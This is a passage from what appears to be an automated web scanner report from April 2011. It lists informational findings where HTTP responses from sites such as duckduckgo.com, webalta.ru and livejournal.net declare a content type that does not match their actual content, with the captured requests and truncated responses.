GET /o.js?d=xss.cx:r1-0,xss.cx:r1-1,xss.cx:r1-2,xss.cx:r1-3,xss.cx:r1-4,xss.cx:r1-5,xss.cx:r1-6,xss.cx:r1-7,xss.cx:r1-8,xss.cx:r1-9,xss.cx:r1-10,xss.cx:r1-11,xss.cx:r1-12,xss.cx:r1-13,xss.cx:r1-14&t=b HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=site%3Axss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 15:39:09 GMT
Content-Type: application/x-javascript; charset=UTF-8
Connection: keep-alive
Expires: Mon, 25 Apr 2011 15:39:08 GMT
Cache-Control: no-cache
Content-Length: 9

nrwot([])
35.14. http://duckduckgo.com/y.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://duckduckgo.com
Path:   /y.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /y.js?q=site%3Axss.cx&s= HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=site%3Axss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 15:39:09 GMT
Content-Type: application/x-javascript; charset=UTF-8
Connection: keep-alive
Expires: Mon, 25 Apr 2011 15:39:08 GMT
Cache-Control: no-cache
Content-Length: 1563

nia('<span class="carbonad-image"><a href="/y.js?u=http%3A%2F%2Fengine.carbonads.com%2Fredirect%2F0%2F4009%2F4174%2F12289%2F76f247e726b74f2e89485962d1236115%2F0%2F1379%2F5174%2F634393175497916493%3Fke
...[SNIP]...
35.15. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-1134822682510879%26output%3Dhtml%26h%3D600%26slotname%3D3061072279%26w%3D160%26lmt%3D1303759227%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fgames.webalta.ru%252F%26dt%3D1303741227549%26bpp%3D5%26shv%3Dr20110420%26jsv%3Dr20110415%26correlator%3D1303741227571%26frm%3D0%26adk%3D1110337129%26ga_vid%3D973557293.1303741228%26ga_sid%3D1303741228%26ga_hid%3D154889240%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1125%26bih%3D929%26fu%3D0%26ifi%3D1%26dtd%3D35%26xpc%3DnaYdoqC7iz%26p%3Dhttp%253A%2F%2Fgames.webalta.ru&uid=ZC45X9Axu6NOUFfX_289668&xy=0%2C0&wh=160%2C600&vchannel=69113&cid=166308&iad=1303741233200-54504055902361870&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9C355083964F0D94352A7538219BE1B4; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Mon, 25 Apr 2011 14:23:42 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_289668");
35.16. http://foreign.dt00.net/zones/form4.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://foreign.dt00.net
Path:   /zones/form4.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /zones/form4.js HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:34:30 GMT
Content-Type: application/x-javascript
Content-Length: 5615
Last-Modified: Wed, 08 Dec 2010 19:18:44 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes


var searchFields = Array();
var searchPhrases = Array();
var searchLinks = Array();
var searchActions = Array();
var beforeSearch = Array();
var afterSearch = Array();

...[SNIP]...
35.17. http://foreign.dt00.net/zones/zone1.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://foreign.dt00.net
Path:   /zones/zone1.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /zones/zone1.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://foreign.dt00.net/foreign/top.php?site=3&cat=30&red=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:02 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 313


document.write('<a href="http://foreign.dt00.net/click.php?id=308&amp;zone=1&amp;country=4" target="_blank"><img src="http://img.dt00.net/foreign/166.gif" alt=".................." border="0" /></a><i
...[SNIP]...
35.18. http://foreign.dt00.net/zones/zone23.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://foreign.dt00.net
Path:   /zones/zone23.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /zones/zone23.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:32:50 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 502


document.write('<ul class="hmenu-1 clearfix hmactive-5 mt"><li class="tm-5"><span>......................</span></li></ul> <div class="l-block">');document.write('<a href="http://foreign.dt00.net/cli
...[SNIP]...
35.19. http://foreign.dt00.net/zones/zone25.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://foreign.dt00.net
Path:   /zones/zone25.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /zones/zone25.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://foreign.dt00.net/foreign/doping.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:03 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 644


document.write('<div style="height:90px;overflow:hidden;background:url(http://img.dt00.net/images/banners/ap-banner-bg.png) no-repeat;"><a href="http://usr.marketgid.com/demo/popunder/" target="_blan
...[SNIP]...
35.20. http://foreign.dt00.net/zones/zone40.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://foreign.dt00.net
Path:   /zones/zone40.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /zones/zone40.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://foreign.dt00.net/foreign/right_premium.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:03 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 536


document.write('<style type="text/css"> @import "http://oth.dt00.net/css/global/global.css"; </style> <ul class="box-title cr-5"><li class="cr-5"><span>..............</span></li></ul> <div class=
...[SNIP]...
35.21. http://games.webalta.ru/public/css/style-games.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://games.webalta.ru
Path:   /public/css/style-games.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/css/style-games.css HTTP/1.1
Host: games.webalta.ru
Proxy-Connection: keep-alive
Referer: http://games.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:22:27 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 22 Dec 2010 12:50:51 GMT
ETag: "e100b5-16b4-497ff33f520c0"
Accept-Ranges: bytes
Content-Length: 5812
Connection: close
Content-Type: text/css

body {padding:0; margin:0 3px 10px; background-color:#FFF;}
body, a, div, td {font:normal 12px Tahoma; color:#666;}

a, a:hover {text-decoration:none;}
a:hover {text-decoration:underline;}

.link-01 {
...[SNIP]...
35.22. http://goods.adnectar.com/analytics/get_avia_js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://goods.adnectar.com
Path:   /analytics/get_avia_js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /analytics/get_avia_js?api_version=3.0.0&site_key=a9aa425c93ef5dff380c&avia_version=0.8.16 HTTP/1.1
Host: goods.adnectar.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Status: 200
ETag: "643abe138f06b030650a5c28ca19bdb4"
X-Runtime: 1
Content-Length: 6324
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: adnectar_id=PObkQ021hYBNKXjmCLweAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"

var exceptionmessage = null;
try {
var avia_already_defined = false;
if (typeof(_an_tracker) !== 'undefined') {
avia_already_defined = true;
}

// First, define JS versions of methods not
...[SNIP]...
35.23. https://hourly.deploy.com/images/logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://hourly.deploy.com
Path:   /images/logo.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/logo.jpg HTTP/1.1
Host: hourly.deploy.com
Connection: keep-alive
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=d83017703d58414f6c12

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:31 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Tue, 04 Aug 2009 06:26:33 GMT
ETag: "60426b-140e-f7bb9840"
Accept-Ranges: bytes
Content-Length: 5134
Cache-Control: max-age=86400
Expires: Tue, 26 Apr 2011 13:39:31 GMT
Connection: close
Content-Type: image/jpeg

GIF89a..9...........H9.SE.`SZXY...fef.............i`0-....JHI....kb.F9..........RH...............XVW..........H=...=;<.F<.......um.vn.G=..vLIJ................vh...._R.......TE..........I6..."......_U.
...[SNIP]...
35.24. http://img.webalta.ru/public/css/style.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img.webalta.ru
Path:   /public/css/style.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/css/style.css HTTP/1.1
Host: img.webalta.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 25 Apr 2011 14:20:00 GMT
Content-Type: text/css
Content-Length: 4614
Last-Modified: Tue, 08 Feb 2011 08:10:02 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Tue, 26 Apr 2011 14:20:00 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

body {padding:0; margin:0 3px 10px; background-color:#FFF;}
body, a, div, td {font:normal 12px Tahoma; color:#666;}

a, a:hover {text-decoration:none;}
a:hover {text-decoration:underline;}

.lin
...[SNIP]...
35.25. http://img.webalta.ru/public/js/webalta.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img.webalta.ru
Path:   /public/js/webalta.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/js/webalta.js HTTP/1.1
Host: img.webalta.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 25 Apr 2011 14:20:00 GMT
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 6817
Last-Modified: Mon, 18 Apr 2011 13:24:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Tue, 26 Apr 2011 14:20:00 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

// version 2

function $$(target)
{
   return document.getElementById(target);
}

function newsSetCategory(n)
{
   var i;
   var item;
   var button;
   
   n = n || 0;

   for(i = 0; i < 10; i++)
   
...[SNIP]...
35.26. http://js.dt00.net/public/smi/elastic/24.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://js.dt00.net
Path:   /public/smi/elastic/24.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/smi/elastic/24.js?time=13 HTTP/1.1
Host: js.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:40:23 GMT
Content-Type: application/x-javascript
Content-Length: 12170
Last-Modified: Mon, 25 Apr 2011 14:30:01 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:40:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

var mginformer = '<div class="box"> <ul class="smi-inf" id = "smi-informer"> <li> <a href="http://mgpublications.com/news/37575" target="_blank" class="smi-inf-img"><img width="75" height="75" src="ht
...[SNIP]...
35.27. http://kino.webalta.ru/banners.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://kino.webalta.ru
Path:   /banners.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /banners.xml HTTP/1.1
Host: kino.webalta.ru
Proxy-Connection: keep-alive
Referer: http://kino.webalta.ru/sc/l/banroll.swf?xml_path=/banners.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:20:33 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 3802

<?xml version="1.0" encoding="utf-8"?>
<flash_parameters copyright="anvsoftPFMTheme">
<preferences>
<golbal>
<basic_property movieWidth="620" movieHeight="348" html_title="Title" loadStyle
...[SNIP]...
35.28. http://kino.webalta.ru/sc/l/loach.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://kino.webalta.ru
Path:   /sc/l/loach.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /sc/l/loach.js HTTP/1.1
Host: kino.webalta.ru
Proxy-Connection: keep-alive
Referer: http://kino.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:22:15 GMT
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Apr 2011 14:17:52 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 14:22:15 GMT
Cache-Control: max-age=86400
Content-Length: 12813

var clip_id;
var channel_id;
var autoplay;
var clip_url = '';
var p_uuid = '';
var sessid = '';
var userid = '';
var username = '';
var notWin = (navigator.userAgent.indexOf('Win') == -1);
var notIE =
...[SNIP]...
35.29. http://l-files.livejournal.net/userapps/10/image  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l-files.livejournal.net
Path:   /userapps/10/image

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a JPEG image.

Request

GET /userapps/10/image HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain
X-Varnish: 1354355956 1354352273
Via: 1.1 varnish
Age: 251968
Date: Mon, 25 Apr 2011 14:20:36 GMT
Last-Modified: Thu, 03 Feb 2011 11:13:43 GMT
Content-Length: 37341
Connection: keep-alive

......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS5 Macintosh.2011:02:03 11:49:08.........................
...[SNIP]...
35.30. http://l-files.livejournal.net/userapps/2/image  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l-files.livejournal.net
Path:   /userapps/2/image

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /userapps/2/image HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain
X-Varnish: 795933937 795900092
Via: 1.1 varnish
Age: 165875
Date: Mon, 25 Apr 2011 14:20:36 GMT
Last-Modified: Thu, 03 Feb 2011 11:12:23 GMT
Content-Length: 34106
Connection: keep-alive

.PNG
.
...IHDR...x...x.....9d6....    pHYs................ cHRM..z%..............u0...`..:....o._.F....IDATx...w.e.Y..V.{.X.ruW.nI..V..dI.A...6`0..0..f.C0.30..0.5.f<c<`...s.rR.r...].U...T...^..c..n...
...[SNIP]...
35.31. http://l-files.livejournal.net/userapps/3/image  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l-files.livejournal.net
Path:   /userapps/3/image

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /userapps/3/image HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain
X-Varnish: 146361845 146338538
Via: 1.1 varnish
Age: 177030
Date: Mon, 25 Apr 2011 14:20:36 GMT
Last-Modified: Wed, 02 Feb 2011 13:36:22 GMT
Content-Length: 7904
Connection: keep-alive

.PNG
.
...IHDR...x...x.............tEXtSoftware.Adobe ImageReadyq.e<....PLTEb3)u....>oK......L..S.t...1.zH..w..V.....L.......h..P.........A..-...\......u$..;..
.....[......m....S.....j.x...ciu.....f
...[SNIP]...
35.32. http://l-files.livejournal.net/userapps/4/image  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l-files.livejournal.net
Path:   /userapps/4/image

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /userapps/4/image?v=1297757136 HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain
X-Varnish: 1545808843 1545808820
Via: 1.1 varnish
Age: 250126
Date: Mon, 25 Apr 2011 14:31:00 GMT
Last-Modified: Tue, 15 Feb 2011 08:05:38 GMT
Content-Length: 33581
Connection: keep-alive

.PNG
.
...IHDR...x...x.............sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....IDATx^...|TW......$...n..L&..........Z.Xq)R(...X..ii..F....m....|...(mw............k....=
...[SNIP]...
35.33. http://l-files.livejournal.net/userapps/9/image  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l-files.livejournal.net
Path:   /userapps/9/image

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /userapps/9/image HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain; charset=UTF-8
X-Varnish: 1630994405 1630993912
Via: 1.1 varnish
Age: 177729
Date: Mon, 25 Apr 2011 14:20:36 GMT
Last-Modified: Wed, 02 Feb 2011 13:37:38 GMT
Content-Length: 34553
Connection: keep-alive

.PNG
.
...IHDR...x...x.............IDATx.....\..5z...r.....V..3.B..3...lc{l..=.......l..g.....l.....I(K-.:...............5WR....>..............g5.....Y(.....D.8Q...20.J.t..i...u....6.IB`,..qJ......
...[SNIP]...
35.34. http://l-files.livejournal.net/vgift/445/small  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l-files.livejournal.net
Path:   /vgift/445/small

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /vgift/445/small HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain
X-Varnish: 1355145633 1355145630
Via: 1.1 varnish
Age: 174245
Date: Mon, 25 Apr 2011 14:20:43 GMT
Last-Modified: Fri, 26 Mar 2010 17:52:18 GMT
Content-Length: 18393
Connection: keep-alive

.PNG
.
